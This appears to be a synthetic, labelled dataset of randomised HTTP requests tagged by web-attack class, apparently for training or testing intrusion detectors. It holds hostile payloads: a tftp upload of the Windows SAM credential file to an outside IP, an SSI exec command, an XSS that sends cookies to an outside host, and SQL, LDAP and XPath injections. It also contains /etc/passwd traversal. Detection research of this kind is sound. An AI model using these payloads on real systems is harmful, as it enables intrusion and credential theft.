User-Agent: Mozilla/8.2 (Windows; U; Windows NT 9.0; ts-at; rv:4.5.2) Gecko/59189938
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: oeni/1.6 69.127.27.89:082
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

UTaKcMyZ43_=i between&a3clwE=@jpEcs1bpneorn&oiceoolre=6738695&tcvb4ethnl91h=enianau5rh2tlheray&twdrtnaecutmi7y=0&iduwC49na=| ps  -auxwww   ;&egtNmOsrseq2see=491220887&notnilMugho=%varKt5en

End - Id: 43065
Start - Id: 44573
class: OsCommanding
GET /ie2KQtt7@h/diar/13HKohx/tem/bZeZxxpoCVyUHWcWQa..aspx?tctqoo=666&o7DE9=4&gNbgsoundLgxmyeV=sd&aiIonwhsnxtd=158.49.25.209++%7C+++++tftp++-i+++++120.153.122.107++++PUT+sam._&rsfbywehear=hSctoTf2ic&b0HT=aWrhh%28eboot.ini%24npjl&5neiawdihoesos=ttsj3z&tmrpjqwwnt=gtiOCB&fr=f%7Ereii&Ah67o1ix0t0Hor=xCpF0lSRQt79&rcpWnqdXCOt7=tnerd1aos0t9eake HTTP/1.0
Host: www.aEg3ho.cz
Connection: close
Accept: application/*, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 149.103.165.5
Cookie: 3tj=emceog1zIrqaiieyya;ah=t?gn\eciinonmbustdinc;aAe6r2d8i=mxt
Date: Thu, 06 Jan 05 24:27:19 CET
From: ne1pNm@taromiNse.be
If-Unmodified-Since: Sat, 01 Sep 07 19:12:04 CET
If-Range: Fri, 15 Sep 06 19:38:08 CET
Proxy-Authorization: NTLM bnhhaXNPeWxoTjJPdW92aGVpRG5mb1Vhc3VzZTNDc0U=
Referer: /6ri3m/lnrebr1/esrrsr6/t2td7hS/5rllnta.asp
User-Agent: Mozilla/4.3 (X11; U; Solaris 0.1; 1y-va; rv:1.4.7) Gecko/09945344
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: gzip
Upgrade: 93A/7.1, Vd8/3.3, stara7/6.4
X-Forwarded-For: 84.212.52.145
----: ---------------------------------------------

null

End - Id: 44573
Start - Id: 44905
class: PathTransversal
GET /5ooax0rwhrpl/f_J9J8JO6DV80xawV9i/eglaofe/hiefesHdTd8eTId/fDWIJFiRRxoa/orGpo7wD/ooHVUoT6/nszReHmNw6rW2c/lrvpet/iXlBjnsvj5j/ft23pvaUO@/gnktV.gif?nilEaelsbfntDto=deletel4Cwo%27rnEpc&XeesrhcceeioCz=3617035&BAZNform=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml&Op89ooa=2458644675&t2sies=8pserviceslc%40HAEn&ne9netnpoyxu=0&aohhxa83Is=2iie%3Ae-xx5%5Dwe+tcpi&httpsBRz0rcpM=uvatehtAurc&nelSexobTra=mtoeshtpassf%25 HTTP/1.1
Host: www.mhu3ROhe.st
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesesimp, cp-950, iso-8859-9;q=0.6, x-mac-roman;q=0.7
Accept-Encoding: 
Accept-Language: itI-lr
Cache-Control: no-transform
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="2"
Date: Wed, 11 Mar 09 10:38:28 GMT
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Sun, 19 Feb 06 02:42:27 UTC
If-Unmodified-Since: Wed, 12 Nov 08 06:00:59 CET
If-Match: "DiFYiT5fGNg7ZUcKTm"
If-None-Match: *
If-Range: *
Max-Forwards: 4939
MIME-Version: 1.5
Pragma: 0=otq
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: /Bsenn/jauohtss/acori.gif
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (Windows; U; WinNT 8.9; al-9b; rv:7.4.7) Gecko/05810119
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: identity
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 869 www.1pnokeh.shtml "gycoaahndt1t" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44905
Start - Id: 40232
class: SSI
GET /sN7/Tandjx7vGxR/metaFQoJlib/irott/ebdsAy/92jplXphpW/no7olFmmUFmaxXTyeW/rhhs0uawex8.msf?brzwlU1z=6&ot=siloDnL7hLs&lendyk1cwiTocss=32330 HTTP/1.0
Host: www.ceN2m0um.de:4
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, deflate;q=0.1
Accept-Language: <!--  #exec    cmd="c:\progra~1\7Edeet2ul\enS\tOlsja5.exe d:\waRiamoq\www.rotronrola.org\nteerQa\database.mdb  /x     exporttofoxpro"-->
Cache-Control: max-age=0
Cookie: u6eAhPl=gb;aep=8536;execkTYz=4357
Cookie2: $Version="759"
Date: Tue, 09 Feb 10 18:43:02 UTC
ETag: "n6nRA-xgDoNJOCei"
Expect: bsy2D
If-Modified-Since: Sun, 11 Jun 06 12:50:01 CET
If-Unmodified-Since: Mon, 25 Aug 08 01:42:58 CET
If-None-Match: *
If-Range: Sat, 20 Jan 07 08:42:46 CET
Max-Forwards: 19
MIME-Version: 1.3
Pragma: sd85ogos=ouorhthv
Referer: http://www.igho.ch/llvepI/di9lSo/t37nk/tnhdqt.exe
TE: deflate
Trailer: Expect
User-Agent: lTcEnaawc (t8gX5o3JB)
UA-Disp: 0833,8043,32
UA-OS: Windows 98
Via: HTTP/5.3 241.20.27.205
Transfer-Encoding: gzip

null

End - Id: 40232
Start - Id: 37678
class: LdapInjection
PUT /NpdUscriptHhscripthttpse_/opeddi/aihaob2inrorjs/E5naTnsdn/tdss.cgi? HTTP/1.1
Content-Length: 68
Content-Language: 0h1Lnt
Content-Encoding: deflate
Content-Location: http://www.evZeOitn.fr/eehtt/dtxlrrVe/7et7/t3pnm.aspx
Content-MD5: aGNzdEVsaXRBZWFsc1d1Ng==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 May 10 12:21:03 UTC
Last-Modified: Tue, 17 Mar 09 18:49:07 UTC
Host: 15.219.112.221
Connection: keep-alive
Accept: audio/basic;q=0.3
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: vciaias=b
Client-ip: 71.214.180.23
Cookie: faIaodtd=wunBer~taserea fuo8;vyiK6eNw-same=6980455;3xtl7ele=6wp;pshaSrn=hYy4Pzh;xq04_dzvscript4qF=4072656409;csesAiFnn2z=dayd1bru7DTokb
Cookie2: $Version="65"
Date: Wed, 14 Jan 04 24:28:57 UTC
ETag: "loLaNmei9ru@mP9sc@d"
Expect: eenen
From: ssDeu@yeiMt.st
If-Modified-Since: Sun, 30 Mar 08 15:55:32 CET
If-Unmodified-Since: Sun, 22 Feb 09 18:20:10 GMT
If-Match: "fdP.5sI.R-AUru88"
If-None-Match: "gCmDnTP8Ts5Rlvd9-"
If-Range: "vp@jb9@-9zMChTqEUXR"
Max-Forwards: 0654
MIME-Version: 8.1
Pragma: ehne7='y8ixje'
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest opaque="Lrea"
Range: 6058-6,88-,-245437
Referer: http://www.nts0Ea.uk/wrTr/tirirwe/ec08ieI.mspx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 2.1; ti-es; rv:9.9.1) Gecko/05704885
UA-CPU: MIPS
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: FTP/8.6 www.s7efne.png:7594, 1.9 163.85.139.46, 8.8 154.0.149.91:2804
Transfer-Encoding: ssmo
Upgrade: utq/9.8, iht/9.3, asta/6.4, eTsoh/3.0, seh/3.0
Warning: 638 www.testaoOo.shtml "I7qnrs9jyxsxit2" 
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3tg=Paeua)(&(objectClass    =  qt*)&tttqlonbeedsEna=u/

End - Id: 37678
Start - Id: 38120
class: LdapInjection
GET /aF-Z9SRuL8o/pFaLEF9cat5k4/7AQ1TOprmk3/1vhpstv0ps4eee8pt.cfm?yiu9nlp=Mn%27+u%2Foh7&tr=tgeolgknm7n&Asysid0ke56ie=se&oa7dnLlinl3s=1010%29%28%26%28objectClass%3Dtate%29%28%7C%28sn++%3D++++8t%29%28cn%3Do++++J*%29%29&ccIct34Nicy2=tTerbody&tphoiarothsot=stus&enOnlar=8hqgn&itpU=nl4ffswl HTTP/1.1
Host: www.trthcdsO.st
Connection: 2feontau
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 76.39.81.250
Cookie: htran9esDdfysg5=etin smtbetween;9Or6=yhejeae;eaetttt=&r]hftL;XPnodehwSwinntcJ=e1etmnAeblemocmuru
Cookie2: $Version="4"
Date: Wed, 09 Mar 05 13:15:28 CET
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Wed, 09 Sep 09 02:25:42 GMT
If-Unmodified-Since: Mon, 27 Feb 06 21:01:05 CET
If-Match: *
If-None-Match: *
If-Range: "fbjaM5oNj78dL@FpyRU"
Max-Forwards: 942
MIME-Version: 2.1
Pragma: rmScdhrl='tethlErh'
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: mtik vc3Eion=aDdae
Range: 136-340130
Referer: http://www.dircFu.com/theam/xvgmoe/bui3nw.asp
TE: chunked,chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: hoSe/7.9
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: 2.6 14.227.29.154, HTTP/8.3 www.rewgqoot.js:117, 8.8 www.sseue.png
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 194.35.95.99
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38120
Start - Id: 41274
class: SqlInjection
GET /9e/nses4dsmre/2eqtUh/olihnothhte7dses/lt7n4/ul5mgr4d5pL/MopenbodyQcatJRrimgFfs.Cn/ate5onyeiso7tras/as5eteylf1ii/uvOvyw/egeusT.jpeg?kbrwbhwRnnoed=access_log6d&n7lw=eids3tak&tio=eZteyeo9hEer3ia&edaieeWtulirA=optsb&Ndn2Lpawe=iieu7nM3c&loshgoisTaide=4380074&rateaaTea=drfdseahioo0hSoib&BEstyleWsallEeh=rcFcnATy7h&er=ee HTTP/1.1
Host: www.oqAeees.ch
Connection: ocdinxs
Accept: audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 203.172.84.59
Cookie: 46wp-A='  OR     '3gtuHel'    >    'S
Cookie2: $Version="01"
Date: Fri, 02 Jul 04 15:45:45 GMT
ETag: "yYaT_JaEeZIxBktQG_W"
Expect: 100-continue
From: ooneIHuy@fwrZ7.be
If-Modified-Since: Wed, 31 Aug 05 07:26:13 GMT
If-Unmodified-Since: Thu, 28 Aug 08 24:38:33 GMT
If-Match: "l@t9OZ-zvcx@kK5U8"
If-None-Match: "haLTw8J4QlObUVgN2."
If-Range: Thu, 29 Jul 04 21:12:14 UTC
Max-Forwards: 24
MIME-Version: 0.7
Pragma: wono=fd0mc
Proxy-Authorization: tne4Es oselie=powntD
Authorization: Basic cmlkZGFhOmxzQmQ=
Range: -5,050699-49322,064735-40
Referer: http://eihoncb.biz/Hc1L/ncdmt/Y5iter.jsp
TE: deflate,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 2.8; un-rd; rv:4.3.1) Gecko/08965859
UA-Disp: 1519,2256,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8605x333
Via: 8.1 255.158.103.242, HTTP/3.5 176.72.109.232:23047, ieve/2.9 www.ntu3Np.png:964
Transfer-Encoding: deflate
Upgrade: nstget/4.5, oth/2.2
Warning: 898 182.226.132.175:4 "domyntnlr2rg2s" "Wed, 18 Mar 09 18:27:27 CET"
X-Forwarded-For: 26.168.221.221
X-Serial-Number: 48153496221638928684
----: -------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 41274
Start - Id: 48180
class: XSS
POST /hnteq7Iloe/szspdkKiy3tTueMod/Tbeu9y/replace.Ts1/un/fcHJiXIyLJ/pwXOUL9F6GWg/uent67MgfecTeohRia/9nvjA2like.sh? HTTP/1.1
Content-Length: 92
Content-Language: 8hLse3ma,m
Content-Encoding: identity
Content-Location: http://www.53uhosun.uk/auaeD/cetntm/hiE8et/tw80mShP.zip
Content-MD5: N2VudHRveXpUZGxkN1JwaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Aug 06 09:51:55 CET
Last-Modified: Fri, 11 Mar 05 24:11:03 GMT
Host: www.tPtcEd.st
Connection: close
Accept: application/postscript, text/*;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a3EXxd-ee, woai-zsr7s22a;q=0.6, feLkoyo-Ie1l
Cache-Control: no-store
Client-ip: 148.144.232.153
Cookie: 4l=yjiMdhn4lu2ip4nd;bemw5fntatm=osobms8w<s
Cookie2: $Version="19"
Date: Mon, 20 Sep 04 23:25:16 GMT
ETag: "13Q28YBJBklXk8y"
Expect: 100-continue
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Sun, 23 Apr 06 08:21:35 GMT
If-Unmodified-Since: Mon, 21 Mar 05 20:12:02 UTC
If-Match: "zAaRhXLSAjxHv4xnzZo"
If-None-Match: *
If-Range: "J8rUj0a0gQ1O.42v.lJ"
Max-Forwards: 1
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: snef otwda=wezessn
Authorization: NTLM bDYzMG5jMWVrZ2JiZGVpYmVsYnNpaW5uZXRmazN5d2ZsYTVp
Range: 57637-,977-
Referer: http://e9Tn.it/lemtl/EttedAey.sh
TE: chunked;q=0.9
Trailer: Range
User-Agent: &{[window.open('http://63.56.233.174/icneer.php4'+document.cookie);]};
UA-CPU: Sparc
UA-Disp: 194,7872,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 615x877
Via: nnejr/7.8 www.ao29s5e.png, he7/6.3 www.icma.css, HTTP/0.6 233.25.126.221
Transfer-Encoding: deflate
Upgrade: r2dRSs/0.4, rrC/1.6
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 142.177.244.22
X-Serial-Number: 43100124354483
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dboo=57380488&veI=insert&4mitfeelirvya=1&r1OcIyI-=5098&exaixmoteiiep=41395811&Ymnph-D.Zrml=d

End - Id: 48180
Start - Id: 38295
class: LdapInjection
GET /eTPG/3hrn9xvnsmtj/ali/lsrmwBw/ohEfusuo/rh/nqEgvWm/4tGIrvMqYfdl90b9G2O/1H20ihhsjeeUmshoCdJ/if37slNumoifahesutne/cademuncIbot8eoe6we.asmx?oV2xd=uNoracexismtchh&seRristEta=1ic0ffoi&np=%29%28+%7C++%28displayName%3Dhad*%29+++%28name++%3D+++had*+++%29%28+++mail%3Dhad*+++%29&r3hmmilwh=695833&fVoaezlw40m8fh=usemi&np0n9sh=of_GArpvNF&esexdoet=rE9I2nozbaoejly&ohtntIr=oaymrB2&6h4Au=tjM. HTTP/1.0
Host: 35.11.147.177
Connection: riwrCtn
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: ae-7ssOo, oSoutu-it4h, hg-prHfme
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="436"
Date: Sun, 20 Jan 08 16:19:18 UTC
ETag: W/"7pB_EDmENlht54k"
Expect: ias6nea
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: *
If-Range: *
Max-Forwards: 3761
MIME-Version: 3.2
Pragma: g=bqhttto
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: /tm2s.mpeg
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/9.7 (Machintosh; U; PPC Mac OS X 8.7; ld-l9; rv:3.7.8) Gecko/25938917
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 7.8 61.101.124.158, 4.2 www.EtTks.jpg, FTP/0.7 73.223.244.163
Transfer-Encoding: nt5c; sxmldmbi=slseM
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38295
Start - Id: 35832
class: XPathInjection
GET /opYehewtueSem0ldh/ele0OrdCe/0ancIarlrTEnnHedee/rlDGhSMJaIBszIQsy6/nsTOK9IVO4T-wGsR1O/iatl/wtiadhtDtralq/tvQIAa/5kQqfreYB_nW2/ymmtvyGuBDSGsM/Drnc-klL.tiff?eEfetqeeeO=cda%27+++++or+1%3C++++ha%2FhoUo%2Fte5%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D37%5D+++or+++%27hyp%27++++%3D+++%27&sock_streamauI=catsoptt%5Dhhxp_+n%3D&9-O9ULZW=i9el&W1JDA2QzRLn=157&oSeIeet5ad6md=268&C-Mnvbscript=miLfrmp9sAwh&ode=htaTorh8YshazV&yreiistSnloh=+h&emrhirpAe9c=688526568&nnhhn0=oT HTTP/1.1
Host: 66.250.171.86
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: dkealjei=st6Hi
Client-ip: 48.181.108.67
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="38"
Date: Fri, 26 Jun 09 11:43:34 GMT
ETag: "mUWr_rP0r53hp.28cK@"
Expect: hi5otp
From: t6Hzyl@dtgtOents.biz
If-Modified-Since: Mon, 25 Feb 08 16:11:21 CET
If-Unmodified-Since: Wed, 11 Feb 04 03:19:00 GMT
If-Match: *
If-None-Match: *
If-Range: "CPtSW96gANhgTA4m8@W"
Max-Forwards: 5955
MIME-Version: 0.9
Pragma: taliu=rnh
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="ptan"
Range: 77-,-9
Referer: /enydc/ycurI/wNnmrs/iIor0/eheh1.gz
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: fzioiius/4.4.8.0.8
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: oCo/8.6 www.9eSnasaf.css:6
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 690061163058
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35832
Start - Id: 35814
class: XPathInjection
GET /eeetuaCsl5toso/n-bgwMlwkWaMjIN0Ll3/_84OdacceptlOwL/tLnfIue496.mspx?ZxRHufprocessing-instructiona=940166782&imcahdcyteokpt=nUgq7ZGd_EF&eq73o=extdnTF_uM&s8ldolfPhrnWoit=teeebgsounden+tmetamtp56y7&asp1ny9neehLss=486&ppmvrsa6tAe=2441&wqoy7lxpAttbrdo=nb3xyor&uetljngsheu6ha=%28i+++++%3C++count%28et%2Fchild%3A%3Atext%28%29%29+++++and+++j++++%3C+count%28ttewq%2Fchild%3A%3Acomment%28%29%29+++and+++++k++++%3C++count%28eoed%2Fchild%3A%3A*%29++++%29&cbsn7hdxo1Sa=altgr HTTP/1.1
Host: www.nnote.org:634
Connection: lwea
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: max-age=58805
Client-ip: 25.4.155.47
Cookie: Rkoa3oTdm=4adminse)iy6r%eismb;ge2t0ds9eBsiro=trmwvfi;At=2322;evehm0=aYIw7
Cookie2: $Version="2"
Date: Sat, 08 Sep 07 21:38:53 CET
ETag: "F.kqxYY8TNuKf1u"
Expect: hr4ene
From: gH0ez@Sireoah.fr
If-Modified-Since: Sat, 27 Nov 04 05:13:25 GMT
If-Unmodified-Since: Sat, 26 Jul 08 01:02:05 UTC
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: *
If-Range: Tue, 08 Dec 09 23:29:00 UTC
Max-Forwards: 6
MIME-Version: 9.9
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Basic bndlZW46dDBlNw==
Range: 205-0247
Referer: http://www.iomaa2rr.net/dti5t/seum/sdeCvlu/osiuUjr3.sh
TE: trailers,deflate,chunked
Trailer: If-None-Match
User-Agent: Mozilla/6.2 (X11; U; Linux i386 8.9; M4-be; rv:4.4.7) Gecko/14490701
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 4es/8.2 www.EuiTthpe.png
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35814
Start - Id: 47162
class: XSS
GET /MHpzEHzbLPLSw/uUtJESajUH/csllc4o4n/aHi/t8bKa4Y23uX0M2SuC/ua/Icpxfb/h@pFTo/Ivii48gnGwt3me9/sV5q6HieQDsAtp/erzeaxyena9slre/utXUWoan877.jpg?ti6beeq3nwnd=0834&yrnspidp=%3Cxml+++++id++++%3D++%22+++X+++++%22++%3E%3Ca+%3E%3Cb+++%3E%26lt%3Bscript%3E%5Balert+++%28%275IAtotcera%27%29%3B%5D%26lt%3B%2Fscript++%3E%3B%3C%2Fb++++%3E%3C%2Fa++++%3E%3C%2Fxml+%3E&m0libuE=939&ltieirsZssttm=bNapimottZnTio&oty8saft=dx_A HTTP/1.0
Host: www.0tkrletf.net
Connection: qCnfhatu
Accept: video/quicktime, image/png, image/*;q=0.5
Accept-Charset: isiri-3342, windows-874;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 123.54.69.161
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="825"
Date: Fri, 19 Feb 10 11:23:44 CET
ETag: W/"G4TOGCjp3UCXPJUC"
Expect: nrnw
From: rRktr@tnrerr.uk
If-Modified-Since: Thu, 23 Dec 04 13:56:31 GMT
If-Unmodified-Since: Tue, 15 Jan 08 02:45:59 GMT
If-Match: *
If-None-Match: "eoLhxPyu.-MTfKxcRM"
If-Range: Sat, 26 May 07 22:34:38 CET
Max-Forwards: 2063
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Basic aWllbmlnbTpjZW90
Range: -016,1-,67332-47295
Referer: /1emgarK/8l9eqnc.conf
TE: gzip;q=0.3,trailers
Trailer: Trailer
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 5.6; i6-oe; rv:7.0.8) Gecko/53950948
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: HTTP/1.8 69.67.233.218:7
Transfer-Encoding: gzip
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 36.159.65.174
X-Serial-Number: 02973768667711464
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47162
Start - Id: 48387
class: XPathInjection
GET /4QmI/5J_ncwx21/rqKJhaxvpehV-6k2/hbeiaeErpIkaw7/.yhrOs94/ieAt3iamenEf/b8Vg/UT/86HZxbI_ZP6d.tiff?7a2ssbfh2rle=35337&5vstyleaHsystemvrDgroup by=o4n%2B HTTP/1.0
Host: 159.104.91.184
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 93.201.17.173
Cookie: iSxtlshqo7NA=21658 or   1<   c/tiegc/ir8B/child::text()[position()=9]   or     378='] | /* | /foo[bar='
Cookie2: $Version="7"
Date: Tue, 02 Jan 07 14:47:34 GMT
ETag: "E4IJvUE@3qO_Ge-8Ip"
Expect: coxttl=daohao
From: hxesydot@eh4weelft.gov
If-Modified-Since: Tue, 03 May 05 24:54:39 GMT
If-Unmodified-Since: Tue, 19 Jun 07 13:58:13 CET
If-Match: "IqEXJgT_wvK@pkd2"
If-None-Match: "RQr.bMGRet.Tjukx"
If-Range: Fri, 30 Jan 04 06:15:17 UTC
Max-Forwards: 72
Pragma: ie1emn='tag'
Proxy-Authorization: NTLM b3N0ckNxM3Vpd3RzZDNic3QxM3JtbnRlT2ZleXRob0RpMDhUbGVoaDNtaWFoeA==
Authorization: NTLM OHBoaHRZaWlsYnRlZW50aTY2ZGlJQXRJcnQ2ZTdtcmxzNGl2ZWM=
Referer: http://www.q2luBlg.biz/gteryey/jeiEt/niHsnsnj/jedavtum.avi
TE: trailers
Trailer: Accept
User-Agent: eese/6.5.6
UA-CPU: 68000
UA-Color: color8
UA-Pixels: 803x2412
Via: HTTP/8.5 10.8.17.247, 8.7 www.9utuoeoy.jpg, 2.0 213.28.173.37
Transfer-Encoding: identity
Upgrade: 6axT/7.7
Warning: 070 230.210.221.222:4519 "bgodpLdlOr7ieeaq" "Wed, 21 Sep 05 15:09:55 GMT"
X-Serial-Number: 63103039438547
----: ------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48387
Start - Id: 36296
class: PathTransversal
GET /4qsaati7yooieaffn/FOmeta.bin?dnoeZGr1=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&esg9ssnbeaReeE5=jykSeo0Ai HTTP/1.0
Host: 246.230.53.166:4
Connection: dltPtef7
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: e4dre-e4afn6a, t-euutma;q=0.5, aJeod7-n, Nlf-or, cwouvdt-7vdestn5;q=0.7
Cache-Control: max-age=96501
Client-ip: 114.100.144.6
Cookie: ecabnt=689900144;seXNl0e=02413;hn=4binpdsIrEslrnS;0Pstlb=wBxT_t8l@;dtorFntro6=944
Cookie2: $Version="483"
Date: Sat, 13 May 06 22:44:41 CET
ETag: W/"_CMpMj-5Yq9_H_Af87"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Fri, 30 Oct 09 11:07:23 GMT
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: "kqQF5Mu_oj6sOLww24x4"
If-None-Match: "SH1GcDSxeFsDm9rCxV"
If-Range: "JN8@@QwFTArlqw@i8ct"
Max-Forwards: 913
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic Ym1uYTpkaWVmc2Nv
Authorization: Digest nc=baEfBefD
Range: 9-463
Referer: /19aaueh/nittNoi.asp
TE: deflate,chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/0.0 (compatible; MSIE 7.0; Unix; 3bc78)
UA-CPU: MIPS
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/9.7 www.natloni.gif:160, onss/3.3 178.225.174.18
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 777 www.eraf47ht.html "lzrhseSsp9edvonjaeyx" "Fri, 05 Jun 09 03:03:54 UTC"
